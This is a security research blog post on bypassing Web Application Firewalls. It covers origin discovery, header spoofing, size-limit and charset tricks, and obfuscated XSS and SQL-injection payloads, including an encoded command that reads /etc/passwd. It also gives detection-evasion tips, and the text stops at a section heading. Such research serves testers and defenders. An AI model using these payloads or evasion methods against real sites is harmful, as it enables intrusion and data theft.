In WAF we (should not) trust

2026-03-25 23:00:00, Author: blog.quarkslab.com

Deep dive into Web Application Firewall (WAF) bypasses, from misconfiguration exploitation to crafting obfuscated payloads. We show the impact of the parsing discrepancy between how a WAF reads a request and how a backend executes it. It is not a bug, it is a feature.

Introduction

You just finished configuring your brand new Web Application Firewall. You are now protected from attackers, or so you think. Maybe your applications have weaknesses, but the WAF has your back... Right?

Throughout this article, we will demonstrate different ways to bypass a WAF.

What is a WAF and How Does it Work?

Before we begin, let us review the basics of what a WAF is and how it works.

A Web Application Firewall (WAF) is a specific form of application firewall that filters, monitors, and blocks HTTP traffic to and from a web service. By inspecting HTTP traffic, it can prevent attacks exploiting known web application vulnerabilities such as SQL injection, XSS, file inclusion, and security misconfigurations. At its core, a WAF is a reverse proxy operating at the application layer (layer 7 of the OSI model). Every HTTP request passes through it before reaching the backend. Unlike network firewalls which operate on IP and port rules, a WAF understands the application layer. It reads HTTP headers, query parameters, cookies, and request bodies.

The following diagram describes the workflow of a request as it passes through a WAF:

Web Application Firewall (WAF) Workflow

To summarize, a WAF is a succession of filters:

Blacklist Check: Before inspecting anything, the WAF checks static lists of blocked IPs, user-agents, countries, or known malicious headers. If the sender matches any entry, the request is dropped immediately. No further processing occurs.
Penalty Box: Clients previously flagged for suspicious behavior (scanning patterns, brute-force attempts, etc.) are temporarily banned. This list is maintained dynamically and is based primarily on IP address and User-Agent. Once you land here, every subsequent request is blocked regardless of its content.
Rate Control: Too many requests in too short a time window triggers throttling, blocking, or a challenge (CAPTCHA). This layer protects against brute force and volumetric DDoS at the application layer.
Client Reputation: Dynamic scoring based on the sender's history: known Tor nodes, botnets, flagged IPs, and behavioral signals across the WAF's global network.
Parsing & Inspection: If the request survives the above layers, the WAF decodes it (URL encoding, body format, chunked transfer, compression, etc.) and runs it through its ruleset. Three detection models are used:
- Signature-based: Regex patterns matched against known attack strings. The OWASP Core Rule Set (CRS) is the most widely deployed baseline, used by ModSecurity, Cloudflare, AWS WAF, and others.
- Anomaly scoring: Instead of blocking on a single match, the WAF accumulates a score across multiple partial matches. A request only gets blocked when the cumulative score exceeds a configured threshold. This reduces false positives while maintaining coverage.
- Custom rules: Rules defined by the operator are evaluated in this same phase, after the default ruleset.
Decision: If the request was not blocked by any previous layer, a final decision is made based on the accumulated score: allow the request through to the origin, block it with a 403, challenge the client with a CAPTCHA or browser integrity check, or log it silently for review. The action depends on the WAF's configuration and the severity of the score.
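
To make the anomaly scoring model more concrete, here is a minimal sketch in Python. The three rules, their scores, and the threshold are assumptions made up for illustration; they are not taken from the OWASP CRS or from any vendor ruleset.

```python
import re

# Hypothetical rules: (name, pattern, score). Real rulesets are far larger.
RULES = [
    ("sql_union", re.compile(r"\bunion\b.+\bselect\b", re.I), 5),
    ("sql_comment", re.compile(r"--|/\*"), 2),
    ("xss_script", re.compile(r"<script\b", re.I), 5),
]
THRESHOLD = 5  # assumed blocking threshold


def inspect(value: str) -> tuple[int, list[str]]:
    """Return the cumulative score and the names of the rules that matched."""
    matched = [name for name, pattern, _ in RULES if pattern.search(value)]
    score = sum(points for name, _, points in RULES if name in matched)
    return score, matched


def decide(value: str) -> str:
    """Block only when the accumulated score reaches the threshold."""
    score, _ = inspect(value)
    return "block" if score >= THRESHOLD else "allow"
```

A lone SQL comment marker scores 2 and passes, while a UNION SELECT followed by a comment accumulates 7 and is blocked. Every bypass later in this article amounts to making sure none of the patterns match in the first place.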

Most WAFs follow an architecture close to this one. You now know enough to start playing with a WAF.

Knock Knock. Who's there? Mis(s)config

When discussing WAF bypass techniques, the first ideas that usually come to mind are payload obfuscation, encoding tricks and fuzzing. While these techniques are widely documented and sometimes effective, they might not be the best in real-world scenarios.

Finding a payload that consistently bypasses detection requires a high number of requests, which generates:

Large volumes of suspicious requests.
Anomalous traffic patterns.
Elevated WAF logs and alerts.

From a defensive standpoint, these behaviors are easy to detect. From an offensive standpoint, they significantly increase the risk of early detection, IP blocking, or session invalidation.

So let's discuss some alternative techniques.

Direct Origin Exposure

Our first technique is the most straightforward. Instead of trying to bypass the WAF's rules, we just ignore it entirely. By directly targeting the origin server, every request reaches the application without ever passing through the WAF, nullifying all of its security protections and potential logging.

This exposure can occur for several reasons:

Historical DNS records still pointing to the origin IP: Passive DNS databases continuously archive DNS resolutions over time, including records that predate a CDN or proxy setup. Querying these databases can reveal the original server IP, allowing an attacker to bypass the proxy and reach the origin directly.
Apex domain misrouting: Organizations often proxy their www subdomain through a CDN but neglect the apex domain (example.com), which can end up resolving directly to the origin IP due to DNS provider limitations.
Infrastructure migrations leaving legacy endpoints accessible: Old staging servers, deprecated load balancers, or previous hosting environments are frequently left live after a migration is considered complete. These forgotten endpoints sit outside any protective layer and directly expose the origin server.
Favicon hash leakage: Shodan and Censys index favicon files across the internet using MurmurHash. An attacker can hash a target site's favicon and search Shodan for matching IPs, identifying the origin server even when it sits behind a CDN.
SPF records revealing internal infrastructure: SPF records are public DNS entries that list all mail servers authorized to send on behalf of a domain. They often include internal hostnames or dedicated IP ranges that inadvertently expose details about the underlying infrastructure to anyone who queries them.

Useful resources to find the origin:

CloudFail enumerates historical DNS records and Cloudflare misconfigurations to surface IP addresses that predate a proxy setup.
Censys provides certificate and host intelligence that can be queried to find servers sharing a common domain name, for example using web.cert.parsed.subject.common_name:"target.com".
Shodan continuously scans the internet and indexes server banners and certificates, making it possible to search for exposed origin servers directly with queries like ssl.cert.subject.CN:"<DOMAIN>" 200.
Favicon hash consists of computing the MurmurHash of a target's favicon and searching Shodan or Censys for all hosts that returned the same hash, revealing the origin IP behind a CDN.
UnWAF is an all-in-one tool specifically designed for origin discovery behind WAFs, combining several of the above techniques into a single automated workflow.
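
As an illustration of the favicon technique, the sketch below computes a favicon hash using only the standard library. It assumes the convention commonly used with Shodan's http.favicon.hash filter: a 32-bit MurmurHash3 over the base64 encoding of the icon, line breaks included. The function names are ours, and in practice the third-party mmh3 package is the usual way to compute this hash.

```python
import base64


def murmur3_32(data: bytes, seed: int = 0) -> int:
    """MurmurHash3 (x86, 32-bit), returned as a signed 32-bit integer."""
    c1, c2 = 0xCC9E2D51, 0x1B873593
    h = seed & 0xFFFFFFFF
    rounded_end = len(data) & ~3
    for i in range(0, rounded_end, 4):
        k = int.from_bytes(data[i:i + 4], "little")
        k = (k * c1) & 0xFFFFFFFF
        k = ((k << 15) | (k >> 17)) & 0xFFFFFFFF
        k = (k * c2) & 0xFFFFFFFF
        h ^= k
        h = ((h << 13) | (h >> 19)) & 0xFFFFFFFF
        h = (h * 5 + 0xE6546B64) & 0xFFFFFFFF
    tail = data[rounded_end:]
    if tail:  # 1 to 3 leftover bytes
        k = int.from_bytes(tail, "little")
        k = (k * c1) & 0xFFFFFFFF
        k = ((k << 15) | (k >> 17)) & 0xFFFFFFFF
        k = (k * c2) & 0xFFFFFFFF
        h ^= k
    # Finalization mix
    h ^= len(data) & 0xFFFFFFFF
    h ^= h >> 16
    h = (h * 0x85EBCA6B) & 0xFFFFFFFF
    h ^= h >> 13
    h = (h * 0xC2B2AE35) & 0xFFFFFFFF
    h ^= h >> 16
    return h - 0x100000000 if h & 0x80000000 else h


def favicon_hash(favicon: bytes) -> int:
    """Hash the base64 text (with newlines) of the raw favicon bytes."""
    return murmur3_32(base64.encodebytes(favicon))


def shodan_query(favicon: bytes) -> str:
    return f"http.favicon.hash:{favicon_hash(favicon)}"
```

The favicon bytes would come from downloading /favicon.ico on the target; any host returned by the resulting query that is not a CDN edge is a candidate origin.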

Header Spoofing

This technique is becoming increasingly rare as misconfigurations get patched, but vulnerable endpoints can still be found in the wild. By injecting specific HTTP headers suggesting the request originates from a trusted internal source, an attacker can get some WAF configurations to whitelist the request and skip inspection entirely.

Headers like X-Forwarded-For, X-Real-IP, X-Originating-IP or X-Custom-IP-Authorization are common targets. When a configuration blindly trusts these headers without validation, setting them to a loopback address (127.0.0.1) or an internal IP range (10.0.0.1, 192.168.0.1) can be enough to bypass the inspection pipeline.

You can find a list of potential host-spoofable HTTP headers in SeanPesce's repository.
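
A small sketch of how the candidate header sets can be enumerated. The header names and addresses are the ones mentioned above; the helper name is hypothetical, and sending the requests is left to whatever HTTP client you already use.

```python
from itertools import product

# Header names and addresses taken from the text above.
HEADERS = [
    "X-Forwarded-For",
    "X-Real-IP",
    "X-Originating-IP",
    "X-Custom-IP-Authorization",
]
TRUSTED_IPS = ["127.0.0.1", "10.0.0.1", "192.168.0.1"]


def spoofed_header_sets(headers=HEADERS, ips=TRUSTED_IPS):
    """Yield one single-header dict per (header, address) pair."""
    for name, ip in product(headers, ips):
        yield {name: ip}
```

Each dict is merged into an otherwise identical blocked request. A response that differs from the baseline (for example a 200 instead of a 403) suggests the header is trusted.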

Request Body Inspection Size Limit

For performance and reliability reasons, WAF appliances limit the maximum size of the requests they analyze. As a result, when a large amount of junk data is placed before the malicious payload, the WAF may skip analyzing the request due to its size in order to conserve resources.

The request should look like:

POST / HTTP/2
Host: target.com
Content-Type: application/json
Content-Length: 8218

{"random_data":"65DA4f8f[..8_kB_data..]Xk8UP","value": "<payload>"}

Each WAF provider defines its own default size limits. The table below summarizes these limits.

WAF Provider	Maximum Request Body Inspection Size Limit
Cloudflare	128 KB for ruleset engine
AWS WAF	8 KB - 64 KB (configurable depending on service)
Akamai	8 KB - 32 KB
Azure WAF	128 KB - 2 MB
FortiWeb by Fortinet	100 MB
Barracuda WAF	64 KB
Sucuri	10 MB
Radware AppWall	up to 1 GB for cloud WAF
F5 BIG-IP WAAP	20 MB (configurable)
Palo Alto	10 MB
Cloud Armor by Google	8 KB (can be increased to 64 KB)
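
The padded request shown earlier can be generated with a few lines of Python. This is a minimal sketch: the field names mirror the example request, and the 8 KB default is only an assumption that should be replaced with the limit of the WAF in front of the target.

```python
import json
import secrets


def padded_json_body(payload: str, limit_bytes: int = 8 * 1024) -> bytes:
    """Build a JSON body in which the payload starts beyond limit_bytes."""
    # token_hex(n) returns 2 * n hexadecimal characters.
    junk = secrets.token_hex(limit_bytes // 2 + 1)
    body = json.dumps({"random_data": junk, "value": payload})
    return body.encode("utf-8")
```

Because the junk field comes first in the serialized object, everything the WAF inspects within its limit is harmless hexadecimal text.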

This technique does not always work because it depends on how the application itself handles oversized request bodies. If the application rejects or truncates requests that exceed a certain size, the payload never reaches the backend and the attack fails.

A common real-world example is file upload functionality. Since legitimate users need to upload large files, WAFs are often configured with a higher size limit or a full exception for those endpoints. Furthermore, this attack only works with HTTP requests that include a body, such as POST, PUT, PATCH, etc.

ℹ️ Source

Assetnote's tool nowafpls helps to perform this attack.

Abusing Trust-Based Exclusions

Some WAF deployments implement exclusion or relaxation rules for traffic originating from well-known cloud providers or enterprise proxy networks.

This typically includes ASNs associated with:

Public cloud providers (AWS, Azure, GCP).
Corporate proxy solutions (e.g., Zscaler).
CDN or security service providers (e.g., Cloudflare).

These exclusions are often introduced for operational reasons rather than security considerations. For example, organizations may need to allow developers or internal users to access restricted application features while working behind an enterprise proxy. In such cases, relying on individual IP whitelisting is impractical, leading maintainers to trust entire proxy ASNs to ensure uninterrupted access.

We can then proxy our requests through different cloud or proxy providers and compare the WAF's behavior for an identical payload.

💡Tips

You can exploit this behavior by combining it with an SSRF or CSRF attack. With SSRF, you can force the target server to make a request through a trusted ASN, making the traffic appear legitimate to the WAF. With CSRF, you can trick a victim who is already behind a trusted corporate proxy like Zscaler into sending the malicious request, which will inherit the trusted ASN and bypass WAF inspection entirely.

Useful resources:

proxyblob: Proxify your traffic through Azure Storage services.
cdn-proxy: Proxy through AWS and/or Cloudflare.
IPSpinner: Pass-through proxy that rotates the source IP address of each request.

WAF has rules and we rule them all.

Before diving into specific attack types, it is important to understand the goal behind every bypass in this section.

WAFs operate on pattern recognition: they compare incoming requests against a library of known-bad signatures. Every technique here exploits the same fundamental gap: the WAF and the backend do not interpret the same request the same way.

The obfuscation methodology

Obfuscation is not a single technique; it is a layered strategy. The goal is not just to "encode a payload" but to make the WAF see something harmless while the backend executes something dangerous.

There are three levels of obfuscation to consider:

Lexical obfuscation: You transform individual characters so the WAF does not recognize them. The dangerous string is still there, just in another shape.
Structural obfuscation: You alter the structure of the payload so it doesn't match known grammar patterns, while remaining valid to the parser or interpreter on the backend. The payload is assembled at runtime by the interpreter itself.
Protocol obfuscation: You manipulate the HTTP request itself so the WAF processes a different version of the request than the application does.

The problem, as covered in the previous part, is that this kind of bypass is heavy by nature. It generates a high volume of malicious requests and significantly increases detection rates.

To stay under the radar, a few mitigations can be applied:

Rate limiting your requests: Slow down your scan to avoid triggering the WAF's rate control and penalty box mechanisms.
Rotating user-agents and headers: Randomizing your HTTP fingerprint makes behavioral profiling harder. Tools like fake-useragent or custom wordlists help here.
Rotating IPs across different ASNs: Using exit nodes spread across major cloud providers (AWS, Azure, Cloudflare) makes IP-based reputation blocking ineffective. Tools like ip-rotator, ProxyBlob or IPSpinner are practical options for this.

None of these guarantees complete invisibility but combined, they make the difference between a scan that gets blocked in the first hundred requests and one that completes.

Lexical Obfuscation

Basic manipulation

Case mixing

This is the first technique and the simplest one. SQL keywords and HTML tag and attribute names are case-insensitive, so switching letters between uppercase and lowercase keeps the payload valid while defeating case-sensitive signatures. JavaScript identifiers, on the other hand, are case-sensitive: aLeRt does not resolve to alert.

sElEcT, UnIoN, oNlOaD, sCrIpT

Although it does nothing on its own, it contributes to the overall obfuscation of the payload.

Comment injection

Every major language supports comments. WAFs may look for keywords as contiguous token sequences, such as UNION followed by a space and SELECT. By inserting a comment between the tokens, the sequence no longer matches the WAF's pattern, while the backend parser treats the comment as a separator and processes the statement normally. Splitting a keyword or tag name itself, as in the second example, only works when some layer between the WAF and the interpreter strips comments before execution.

UNION/**/SELECT/**/1,2,3
<scr<!---->ipt>alert(1)</scr<!---->ipt>

Whitespace substitution

Spaces are not the only whitespace. Backend parsers accept several other characters as separators, and the WAF may not normalize them before matching. These characters can be used instead of a regular space in order to trick the WAF:

%09 -> horizontal tab
%0a -> newline
%0d -> carriage return
%0b -> vertical tab
%a0 -> non-breaking space
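
The three basic manipulations are easy to automate. The helpers below are an illustrative sketch with names of our own choosing; they take an explicit random generator so that results are reproducible.

```python
import random

# URL-encoded whitespace alternatives listed above.
WHITESPACE_ALTERNATIVES = ["%09", "%0a", "%0d", "%0b", "%a0"]


def mix_case(text: str, rng: random.Random) -> str:
    """Randomly upper- or lower-case each letter."""
    return "".join(
        c.upper() if rng.random() < 0.5 else c.lower() for c in text
    )


def substitute_spaces(text: str, rng: random.Random) -> str:
    """Replace each literal space with an alternative whitespace character."""
    return "".join(
        rng.choice(WHITESPACE_ALTERNATIVES) if c == " " else c for c in text
    )


def comment_separate(text: str) -> str:
    """Replace the spaces between SQL tokens with an empty inline comment."""
    return text.replace(" ", "/**/")
```

For example, comment_separate("UNION SELECT 1") gives UNION/**/SELECT/**/1, and applying mix_case on top of it produces a different variant on every run. Remember that mix_case is only safe on case-insensitive parts of a payload.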

Encoding

Encoding is where lexical obfuscation starts getting powerful.

Char encoding

Character encoding is the most common starting point. Let us start with URL encoding, which is almost always normalized by the WAF. Double URL encoding adds a second layer: the WAF decodes the payload once and inspects a string that is still encoded, which is then passed to the backend, where a second decoding pass restores the original characters.

%25%32%66 -> %2f -> /   
double urlencode -> simple urlencode -> character
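
The same transformation in Python, as a short sketch. The helper names are ours; unquote comes from the standard library and plays the role of one decoding pass.

```python
from urllib.parse import unquote


def encode_all(text: str) -> str:
    """Percent-encode every byte, including characters that are normally safe."""
    return "".join(f"%{byte:02x}" for byte in text.encode("utf-8"))


def double_urlencode(text: str) -> str:
    """Apply full percent-encoding twice."""
    return encode_all(encode_all(text))


encoded = double_urlencode("/")
after_waf = unquote(encoded)        # what a single-pass decoder sees
after_backend = unquote(after_waf)  # what a second decoding pass restores
```

Here encoded is %25%32%66, after_waf is %2f and after_backend is /. The bypass only works when something behind the WAF performs that second decoding pass.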

Next, Unicode escapes represent any character as \uXXXX in JavaScript. A WAF signature looking for confirm will not match co\u006efirm.

\u006e = n → co\u006efirm = confirm 
\u0027 = ' → useful for quote bypasses 
\u003c = < → useful for HTML injection

Finally, octal encoding and hex encoding work in the same way and are supported natively in JavaScript and in some Unix shells. Octal represents character codes in base 8, while hex encoding represents characters as their hexadecimal byte values.

**Octal Encoding**
\141\154\145\162\164\50\61\51 -> alert(1)

cat $'\x2f\145\164\143\x2f\160\141\163\163\167\144' -> cat /etc/passwd (Unix context)

**Hex Encoding**
\x61\x6c\x65\x72\x74\x28\x31\x29 -> alert(1)

cat $'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64' -> cat /etc/passwd
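
These escape sequences do not need to be written by hand. The following sketch generates the three forms shown above; the function names are hypothetical and the input is assumed to be plain ASCII.

```python
def unicode_escape(text: str) -> str:
    """JavaScript-style \\uXXXX escapes."""
    return "".join(f"\\u{ord(c):04x}" for c in text)


def octal_escape(text: str) -> str:
    """Octal escapes without zero padding, as in the example above.

    Unpadded escapes are only unambiguous when every character is escaped.
    """
    return "".join(f"\\{byte:o}" for byte in text.encode("ascii"))


def hex_escape(text: str) -> str:
    """\\xNN escapes."""
    return "".join(f"\\x{byte:02x}" for byte in text.encode("ascii"))
```

Calling octal_escape("alert(1)") and hex_escape("alert(1)") reproduces the two alert(1) strings above, and unicode_escape("n") gives \u006e.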

JS encode

Two notable methods for JavaScript obfuscation are JSFuck and JJEncode. There are others, but we will focus on these two. JSFuck rewrites any JavaScript expression using only six characters: square brackets, parentheses, the exclamation mark, and the plus sign. It works by exploiting JavaScript's type coercion system. JJEncode follows the same philosophy but uses a reduced charset based on the dollar sign and the underscore, built around a reference variable. This allows for shorter payloads.

# JSFuck -> eval(alert(1))
[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[+!+[]]]+[+!+[]]+([]+[]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[!+[]+!+[]]])()

# JJEncode -> execute alert(1)
$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"(\\\""+$.__$+"\\\"\\"+$.$__+$.___+")"+"\"")())();

This type of encoding is easily identifiable by its length and by entropy analysis. To use it effectively, encode only the dangerous tokens and leave the rest to other techniques.

Structural Obfuscation

String splitting

The principle is simple: never send the blocked string whole. Split it at the token level and let the interpreter reassemble it at runtime.

The most explicit form of this technique is to assign each character of the blocked word to its own variable, then concatenate them into a working call. An XSS payload might look like this:

a="a"; b="l"; c="e"; d="r"; e="t";
f="("; g="1"; h=")";

eval(a+b+c+d+e+f+g+h)   // eval("alert(1)")

In JavaScript, a sink is any function or property that can execute or interpret code dynamically. Using an alternative execution sink is mandatory to avoid detection. The obvious ones like eval() and Function() are heavily flagged. The goal is to find a sink that is either unknown to the WAF or disguised enough to pass inspection.

Accessing Function through the constructor chain. The keyword Function never appears: you navigate JavaScript's prototype chain to reach the same constructor.

[]["con"+"structor"]["con"+"structor"]("ale"+"rt(1)")()
(()=>{})["con"+"structor"]("ale"+"rt(1)")()

Using setTimeout and setInterval. Both accept a string and evaluate it, but are far less scrutinized by WAF rules.

setTimeout("ale"+"rt(1)")
setInterval("ale"+"rt(1)", 99999)

Using location as a sink via the javascript: URI scheme.

location="java"+"script:ale"+"rt(1)"

Using document.write with atob. The raw payload never appears in the request: the browser decodes and renders it at runtime.

document.write(atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="))
// decodes from base64 to <script>alert(1)</script>

Executing JavaScript through HTML without a script tag. The <script> tag is the most obvious and most blocked vector. The browser offers dozens of ways to execute JavaScript through pure HTML that WAFs either do not monitor or do not associate with code execution.

<img src=x onerror=alert(1)>
<input autofocus onfocus=alert(1)>
<details ontoggle=alert(1) open>
<svg onload=alert(1)>
<svg><animate onbegin=alert(1) attributeName=x>
<marquee onstart=alert(1)>
<a href="javascript:alert(1)" autofocus onfocus=this.click()>x</a>
<iframe src="javascript:alert(1)">

ℹ️ Further readings

Find many more execution sink vectors following these links:

PortSwigger Cheat Sheet.

Paracyberbellum.

PayloadAllTheThings.

Parameter pollution

HTTP Parameter Pollution (HPP) exploits a fundamental parsing gap between the WAF and the backend. When a request contains multiple parameters sharing the same name, the WAF inspects each one individually and sees nothing malicious, while the backend may merge them into a single value.

However, the effectiveness of this technique depends heavily on how the backend framework handles duplicate parameters. Frameworks like ASP.NET, ASP, and Node.js concatenate them into a single value, which is the behavior that makes HPP exploitable. Others like PHP only keep the last occurrence, Flask and Django keep the first, while Python Zope and Golang return an array. Understanding the target framework's parsing behavior is therefore essential before attempting this technique.

This section is taken from Bruno Mendes' article.

How frameworks handle duplicate parameters:

Framework	Input	Output
ASP.NET	param=val1&param=val2	param=val1,val2
ASP	param=val1&param=val2	param=val1,val2
Node.js	param=val1&param=val2	param=val1,val2
Python - Zope	param=val1&param=val2	param=['val1','val2']
Golang net/http	param=val1&param=val2	param=['val1','val2']
PHP	param=val1&param=val2	param=val2 (last wins)
Flask / Django	param=val1&param=val2	param=val1 (first wins)

As we can see, some frameworks concatenate the values into a single parameter. We can imagine a payload like /?q=1'&q=alert(1)&q='2, which ASP.NET, for example, reassembles into userInput = '1',alert(1),'2'.

Combined with string splitting, it becomes a powerful bypass tool.
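
The behaviors in the table can be simulated to preview what a given backend would hand to the application. This is a sketch only: the style names are labels we made up for the four behaviors listed above, not real framework APIs.

```python
from urllib.parse import parse_qsl


def combine(query: str, name: str, style: str):
    """Return the value a backend would expose for a duplicated parameter.

    Assumes the parameter appears at least once in the query string.
    """
    values = [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]
    if style == "concat":  # ASP.NET, ASP, Node.js in the table
        return ",".join(values)
    if style == "last":    # PHP
        return values[-1]
    if style == "first":   # Flask / Django
        return values[0]
    if style == "list":    # Zope, Golang net/http
        return values
    raise ValueError(f"unknown style: {style}")


QUERY = "q=1'&q=alert(1)&q='2"
```

With the query above, the concatenating style yields 1',alert(1),'2 while no individual parameter contains a complete payload, which is exactly the gap HPP relies on.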

Putting payloads into practice

As mentioned above, each technique individually will have difficulty bypassing any WAF. But this is where you need to be creative: an attacker needs to combine all these techniques into a single payload. That is what we call a polymorphic payload: the same payload can be written in different ways.

The following is an example of an XSS polymorphic payload:

<SvG/onfake="x=54Ur0N"oNlOaD=;1^(\u0061\u006c\u0065\u0072\u0074)``^1//

Where:

Component	Technique	Why
SvG	Mixed case tag	Lowers the chance of a signature match
onfake="x=54Ur0N"	Fake attribute with leet value	Confuses the parser so it misidentifies the real event handler
oNlOaD	Mixed case real event handler	Same as the tag
;	Statement separator	Breaks the expression so it doesn't look like a single executable statement
1^(...)^1	XOR wrapping	Makes the function call look like arithmetic, the call is just a side effect
\u0061\u006c\u0065\u0072\u0074	Full unicode encoding of alert	The word alert never appears anywhere in the raw request
``	Backtick invocation	Calls the function without parentheses
//	JS comment	Neutralizes anything the application appends after the injection point

SQL injection is also a good fit for polymorphic construction. Here is a UNION-based injection payload that combines several techniques simultaneously:

'%0auNiOn/**/sElEcT CHAR(118,101,114,115,105,111,110),CONCAT(0x7e,database(),0x7e),3--+

Where:

Component	Technique	Why
%0a	Newline as whitespace	Replaces the space before UNION, so regexes expecting a literal space fail
uNiOn	Mixed case	UNION keyword never appears in its expected form
/**/	Comment injection	Separates tokens so contiguous keyword detection fails
sElEcT	Mixed case	Same as above for SELECT
CHAR(118,101,114,115,105,111,110)	CHAR() reconstruction	The string version never appears; it's assembled by the DB at runtime
CONCAT(0x7e,database(),0x7e)	Hex literal + function	0x7e is the tilde ~ as a hex literal, no string delimiters needed
--+	Comment + URL-safe terminator	Truncates the rest of the query cleanly

Even if these payloads no longer work for some WAFs, the techniques used can allow the generation of other payloads.
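
Two of the building blocks from the table, CHAR() reconstruction and hex literals, are simple to generate for any string. The helper names below are hypothetical, and the output follows the MySQL-style syntax used in the payload above.

```python
def sql_char(text: str) -> str:
    """Rebuild a string from its character codes with CHAR()."""
    return "CHAR(" + ",".join(str(ord(c)) for c in text) + ")"


def sql_hex_literal(text: str) -> str:
    """Express a string as a hex literal, so no quotes are needed."""
    return "0x" + text.encode("utf-8").hex()
```

Calling sql_char("version") returns the CHAR(118,101,114,115,105,111,110) expression used above, and sql_hex_literal("~") returns 0x7e.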

Protocol Obfuscation

These attacks keep the malicious payload completely unmodified. Instead, they mutate the protocol structure leading to parsing discrepancies. Parsing discrepancies have been known as a critical security weakness since at least 1998 and have been studied academically for quite some time. In our scenario, the WAF misreads the structure and skips the payload, while the backend framework parses it correctly and executes the attack.

Charset switching

This technique was first presented by Soroush Dalili at SteelCon and BSides Manchester 2017, under the title "A Forgotten HTTP Invisibility Cloak".

The core idea is that the Content-Type header in an HTTP request can declare a character encoding for the request body. Normally this is UTF-8, but nothing stops you from declaring something else. The backend handles many of these encodings natively and decodes the body correctly before passing it to the application. However, depending on the vendor, a WAF may have its entire signature base written for UTF-8 and therefore fail to analyze the request.

We will use IBM037 encoding, but many others are compatible, particularly with IIS servers. You can generate the encoded payload in Python:

import urllib.parse
payload = "'union all select * from users--"
print(urllib.parse.quote_plus(payload.encode("IBM037")))

The final request should look like:

POST /vulnerable.aspx HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=ibm037

%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
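
To check what the backend will see, the encoded body can be decoded again. A small sketch, using cp037, the name of Python's codec for IBM037; the function name is ours.

```python
from urllib.parse import unquote_to_bytes

ENCODED_BODY = (
    "%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40"
    "%86%99%96%94%40%A4%A2%85%99%A2%60%60"
)


def decode_body(body: str, charset: str = "cp037") -> str:
    """Undo the percent-encoding, then decode the bytes with the charset."""
    return unquote_to_bytes(body).decode(charset)
```

decode_body(ENCODED_BODY) returns the original 'union all select * from users-- string. A WAF that assumes UTF-8 only ever sees the percent-encoded EBCDIC bytes.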

ℹ️ Further reading

The original work can be found here

$Version cookie parsing

Research published by PortSwigger (Zakhar Fedotkin, December 2024) demonstrates how the legacy RFC 2109 cookie standard can be abused to bypass WAF inspection. By prepending $Version=1 to a Cookie header, some servers switch to a legacy parsing mode that supports quoted string values. Inside these quoted strings, special characters like semicolons, newlines, and backslashes can be octal-encoded, effectively hiding malicious payloads from WAF signature matching.

For example, on servers running Apache Tomcat or Python-based frameworks, the following bypasses WAF detection:

# eval('test') with every character backslash-escaped
Cookie: $Version=1; param="\e\v\a\l\(\'\t\e\s\t\'\)"

# eval('alert(1)') fully encoded in octal
Cookie: $Version=1; q="\145\166\141\154\050\047\141\154\145\162\164\050\061\051\047\051"
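
The octal form of such a cookie can be produced as follows. This is a minimal sketch with hypothetical helper names; it assumes an ASCII payload and encodes every character as a three-digit octal escape inside a quoted string.

```python
def octal_quote(value: str) -> str:
    """Return the value as a quoted string of three-digit octal escapes."""
    escaped = "".join(f"\\{byte:03o}" for byte in value.encode("ascii"))
    return f'"{escaped}"'


def version_cookie(name: str, value: str) -> str:
    """Build a Cookie header that opts into legacy quoted-string parsing."""
    return f"Cookie: $Version=1; {name}={octal_quote(value)}"
```

version_cookie("q", "eval('alert(1)')") reproduces the octal header shown above.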

ℹ️ Further reading

The full research is available here

WAFFLED, the multipart request splitting

The WAFFLED study (2024) exploits content-type parsing discrepancies across major WAFs. The core finding is that WAFs and backend frameworks frequently disagree on how to parse the same HTTP request body when it uses a non-standard or mixed content type.

The attack surface is multipart/form-data. When a payload is split across multiple parts, WAFs inspecting each part independently never see a complete signature. The backend reassembles all parts before execution.

The WAFFLED research goes further and identifies three deeper discrepancy classes.

Boundary confusion

The boundary value is user-controlled. A crafted boundary containing quotes or semicolons causes some WAF parsers to misidentify where parts begin and end, while the backend parser handles it correctly.

POST /search HTTP/1.1
Content-Type: multipart/form-data; boundary="----Boundary; boundary=legit"

------Boundary; boundary=legit
Content-Disposition: form-data; name="input"

' UNION SELECT 1,2,3--
------Boundary; boundary=legit--

The WAF interprets the boundary as legit due to the injected semicolon, fails to locate the actual part boundaries, and skips inspection. The backend uses the full boundary string and parses the body correctly.

Content-type stacking

